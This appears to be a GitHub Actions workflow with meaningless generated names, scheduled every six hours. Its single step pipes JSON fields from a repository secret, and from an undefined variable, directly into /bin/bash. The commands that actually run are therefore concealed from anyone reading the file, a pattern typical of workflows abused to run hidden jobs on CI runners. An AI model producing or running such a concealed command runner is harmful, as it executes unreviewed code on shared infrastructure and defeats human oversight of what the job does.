name: brookeruby844

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: brookeruby844
        env:
          ks693: ${{ secrets.ks693 }}
        run: |
          echo $ks693 | jq -r .bw74694 | /bin/bash
          echo $ngzpa0318 | jq -r .jyult0 | /bin/bash

